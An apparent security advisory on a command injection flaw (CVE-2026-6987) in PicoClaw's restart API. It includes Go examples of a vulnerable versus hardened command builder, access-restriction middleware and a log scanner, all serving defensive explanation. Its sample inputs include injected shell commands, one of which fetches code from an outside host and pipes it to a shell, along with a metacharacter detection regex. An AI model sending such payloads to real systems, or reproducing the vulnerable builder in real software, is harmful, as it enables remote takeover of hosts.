CVE-2026-6987 allows remote attackers to inject commands through PicoClaw’s restart API
PicoClaw up to and including version 0.2.4 has a command injection flaw in its Web Launcher Management Plane, reachable through the /api/gateway/restart endpoint. The flaw is remotely exploitable: an attacker who can reach that API can craft requests that cause the service to execute unintended system commands.
The first public record is the NVD entry for CVE-2026-6987, published on 2026-04-25; the source used here reports a CVSS score of 7.3 (High). The affected component is described only as an unknown function in the restart path. The project had been notified through an issue report but had not responded at the time of publication.
The weakness sits in a management-plane operation, which matters because restart functions typically drive system-level actions rather than ordinary application logic. In this case the API evidently does not treat incoming request data as untrusted before it reaches command execution, so a crafted request can change what the host runs when the restart action is invoked.
The source material also notes disagreement across advisory feeds, with different records showing different CVSS values and version ranges, but the central technical issue is the same in all of them: a network-reachable command injection path in PicoClaw up to 0.2.4. The attack surface is the management API rather than a local interface, so real-world exposure depends on how widely that endpoint is reachable.
Command injection arises when application input is passed to a shell or command builder without neutralizing the characters the interpreter treats specially. Here the endpoint drives a gateway restart, so any user-controlled parameter that influences that logic can act as a command separator, an extra option, or an additional command unless it is constrained to a known-good set of values.
Because the vulnerable function is not identified in the available source, the exact exploit path cannot be stated precisely, but the mechanism is clear from the advisory text. Once untrusted input reaches command execution, the service can be steered into running attacker-supplied instructions with the privileges of the PicoClaw process or service account.
The component name reinforces the risk. A Web Launcher Management Plane exists to expose administrative control, and restart functions are especially sensitive because they sit close to operating-system actions. When that control path is network accessible, the security boundary depends on both input handling and access restrictions, and here the first of those has failed.
As noted above, the issue is remotely reachable and the project had not responded to the report at publication. For operators, the immediate concern is therefore the vulnerable version range combined with an exposed management endpoint, especially where the API is reachable from outside a trusted network.
Attackers use the restart endpoint to turn input into system commands
The vulnerable behavior centers on the /api/gateway/restart URL path, where request manipulation can trigger command injection in the management plane. The advisory names only an unknown function, but the impact is explicit: crafted input alters command execution, and the attack can be launched remotely.
Flaws of this kind depend on a downstream interpreter receiving user-controlled data without strict validation. The source material classifies the issue as CWE-77 (Improper Neutralization of Special Elements used in a Command) and its parent CWE-74 (Injection); both describe special characters reaching another component, here a command interpreter, without being neutralized.
The consequences extend beyond a single restart action. If the injected command runs with the service's privileges, it can affect confidentiality, integrity, and availability at the host level, and the advisory text explicitly warns that a remote attacker may gain control over the underlying host or service.
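The CWE-77 pattern described above, as an added example written for this page rather than PicoClaw's own code: the advisory does not give the vulnerable function or parameter names, so the restart wrapper path, the mode parameter, and the allowed values below are all assumptions. The vulnerable builder concatenates the request parameter into a string a shell will parse; the hardened builder allowlists the value and passes argv directly, so no interpreter ever sees the input.

```go
package main

import (
	"fmt"
	"os/exec"
	"regexp"
)

// Hypothetical wrapper the restart endpoint is assumed to invoke. The real
// PicoClaw command, handler and parameter names are not given in the advisory.
const restartWrapper = "/opt/picoclaw/bin/restart-gateway"

// shellMeta matches characters a POSIX shell treats as separators, quoting or
// expansion: the "special elements" that CWE-77 / CWE-74 refer to.
var shellMeta = regexp.MustCompile("[;&|`$(){}<>\\n\"'\\\\]")

// HasShellMeta reports whether a parameter contains shell special characters.
func HasShellMeta(s string) bool { return shellMeta.MatchString(s) }

// BuildRestartVulnerable is the injection pattern: the request parameter is
// concatenated into a string that /bin/sh will parse, so "soft; id" becomes
// two commands. It returns the argv that would be handed to exec.
func BuildRestartVulnerable(mode string) []string {
	return []string{"/bin/sh", "-c", restartWrapper + " --mode=" + mode}
}

// allowedModes is the hypothetical closed set of values the endpoint accepts.
var allowedModes = map[string]bool{"soft": true, "hard": true}

// BuildRestartHardened allowlists the parameter and builds argv directly. No
// shell is involved, so separators in the input carry no meaning even if the
// allowlist were later widened to free-form values.
func BuildRestartHardened(mode string) ([]string, error) {
	if !allowedModes[mode] {
		return nil, fmt.Errorf("restart mode %q not permitted", mode)
	}
	return []string{restartWrapper, "--mode=" + mode}, nil
}

// RunArgv executes argv without a shell; argv[1:] are passed as discrete
// arguments and are never re-parsed by an interpreter.
func RunArgv(argv []string) error {
	return exec.Command(argv[0], argv[1:]...).Run()
}

func main() {
	input := "soft; id > /tmp/pwned" // constructed attacker-controlled value
	fmt.Println("vulnerable argv:", BuildRestartVulnerable(input))
	if _, err := BuildRestartHardened(input); err != nil {
		fmt.Println("hardened:", err)
	}
	argv, _ := BuildRestartHardened("soft")
	fmt.Println("hardened argv:", argv)
}
```

The allowlist is the real control; the metacharacter check is only useful as a detection signal, because an attacker can sometimes reach an interpreter without any of those characters (for example through an option that itself runs a command).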
Possible steps
Reduce exposure to CVE-2026-6987 by limiting who can reach the endpoint and removing public reachability.
- Restrict access to /api/gateway/restart to trusted networks only, enforced at a reverse proxy or in the service itself.
- Upgrade PicoClaw beyond 0.2.4 as soon as a fixed release is published.
- Remove public exposure of the Web Launcher Management Plane.
- Monitor access logs for unusual requests to the restart endpoint, and the host for unexpected processes started by the PicoClaw service.
- Review deployments for direct network reachability to the management API.
- Track vendor and advisory updates for a published patch.
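The first and fourth steps above, as an added example that is not part of PicoClaw or of any advisory: a middleware that serves /api/gateway/ paths only to assumed trusted networks (the CIDRs are placeholders), and a scanner that runs over constructed common-log-format lines and flags restart requests that either carry shell metacharacters or come from outside those networks.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"net/url"
	"regexp"
	"strings"
)

// trustedNets is an assumed management network; adjust to the deployment.
var trustedNets []*net.IPNet

func init() {
	for _, c := range []string{"10.0.0.0/8", "127.0.0.0/8"} {
		_, n, err := net.ParseCIDR(c)
		if err != nil {
			panic(err)
		}
		trustedNets = append(trustedNets, n)
	}
}

// IsTrusted reports whether remoteAddr (host or host:port) lies in a trusted network.
func IsTrusted(remoteAddr string) bool {
	host := remoteAddr
	if h, _, err := net.SplitHostPort(remoteAddr); err == nil {
		host = h
	}
	ip := net.ParseIP(host)
	if ip == nil {
		return false
	}
	for _, n := range trustedNets {
		if n.Contains(ip) {
			return true
		}
	}
	return false
}

// RestrictManagementPlane serves management paths only to trusted sources. It
// keys on RemoteAddr, not X-Forwarded-For, which a remote attacker can set
// unless a trusted proxy strips it.
func RestrictManagementPlane(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if strings.HasPrefix(r.URL.Path, "/api/gateway/") && !IsTrusted(r.RemoteAddr) {
			http.Error(w, "forbidden", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// shellMeta matches characters a POSIX shell treats specially.
var shellMeta = regexp.MustCompile("[;&|`$(){}<>\"'\\\\]")

// sampleLog is constructed for this example in common log format.
var sampleLog = []string{
	`10.0.5.2 - - [25/Apr/2026:10:00:01 +0000] "POST /api/gateway/restart?mode=soft HTTP/1.1" 200 12`,
	`203.0.113.7 - - [25/Apr/2026:10:00:09 +0000] "POST /api/gateway/restart?mode=soft%3Bid HTTP/1.1" 200 12`,
	`10.0.5.9 - - [25/Apr/2026:10:01:30 +0000] "POST /api/gateway/restart?mode=soft%3B%20curl%20http://198.51.100.1/x%7Csh HTTP/1.1" 200 12`,
	`203.0.113.8 - - [25/Apr/2026:10:02:00 +0000] "GET /api/status HTTP/1.1" 200 40`,
	`198.51.100.23 - - [25/Apr/2026:10:03:12 +0000] "POST /api/gateway/restart?mode=hard HTTP/1.1" 200 12`,
}

// Finding is one flagged restart request.
type Finding struct {
	Src, Reason, Line string
}

// ScanRestartRequests flags restart requests whose decoded query carries shell
// metacharacters, and otherwise any restart request from an untrusted source.
func ScanRestartRequests(lines []string) []Finding {
	var out []Finding
	for _, l := range lines {
		f := strings.Fields(l)
		if len(f) < 7 {
			continue
		}
		u, err := url.Parse(f[6]) // request target: path plus query
		if err != nil || u.Path != "/api/gateway/restart" {
			continue
		}
		q, err := url.QueryUnescape(u.RawQuery)
		if err != nil {
			q = u.RawQuery // malformed encoding: inspect it raw rather than drop it
		}
		switch {
		case shellMeta.MatchString(q):
			out = append(out, Finding{f[0], "shell metacharacters in restart parameters", l})
		case !IsTrusted(f[0]):
			out = append(out, Finding{f[0], "restart request from outside trusted networks", l})
		}
	}
	return out
}

func main() {
	mux := http.NewServeMux()
	mux.HandleFunc("/api/gateway/restart", func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprintln(w, "restart accepted") // placeholder; PicoClaw's real handler goes here
	})
	handler := RestrictManagementPlane(mux)
	_ = handler // hand to http.ListenAndServe in a real deployment; not started here so the example runs offline
	for _, f := range ScanRestartRequests(sampleLog) {
		fmt.Printf("%-15s %s\n  %s\n", f.Src, f.Reason, f.Line)
	}
}
```

Three of the five constructed lines are flagged: the two with an injected separator (one of them from inside the trusted range, which is why the metacharacter check is evaluated first) and the plain restart from an untrusted address. Network restriction without log review would hide the second case, and log review without restriction still leaves the endpoint open.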
Sources: nvd.nist.gov, codeant.ai, appsecure.security, GitHub Advisories, Feedly